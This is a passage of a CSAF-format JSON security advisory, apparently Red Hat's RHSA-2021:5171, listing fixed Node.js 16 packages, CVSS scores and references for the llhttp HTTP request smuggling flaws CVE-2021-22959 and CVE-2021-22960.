"AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22959" }, { "category": "external", "summary": "RHBZ#2014057", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014057" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22959", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22959" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22959", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22959" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/" } ], "release_date": "2021-10-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T17:21:31+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5171" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "llhttp: HTTP Request Smuggling due to spaces in headers" }, { "cve": "CVE-2021-22960", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-10-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2014059" } ], "notes": [ { "category": "description", "text": "An HTTP Request Smuggling (HRS) vulnerability was found in the llhttp library, used by Node.JS. During the parsing of chunked messages, the chunk size parameter was not validated properly. In situations where HTTP conversations are being proxied (such as proxy, reverse-proxy, load-balancer), an attacker can use this flaw to inject arbitrary messages through the proxy. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "llhttp: HTTP Request Smuggling when parsing the body of chunked requests", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\".", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22960" }, { "category": "external", "summary": "RHBZ#2014059", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014059" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22960", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22960" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22960", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22960" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/" } ], "release_date": "2021-10-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T17:21:31+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5171" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "llhttp: HTTP Request Smuggling when parsing the body of chunked requests" }, { "cve": "CVE-2021-33502", "cwe": { "id": "CWE-400", "name": "Uncontrolled 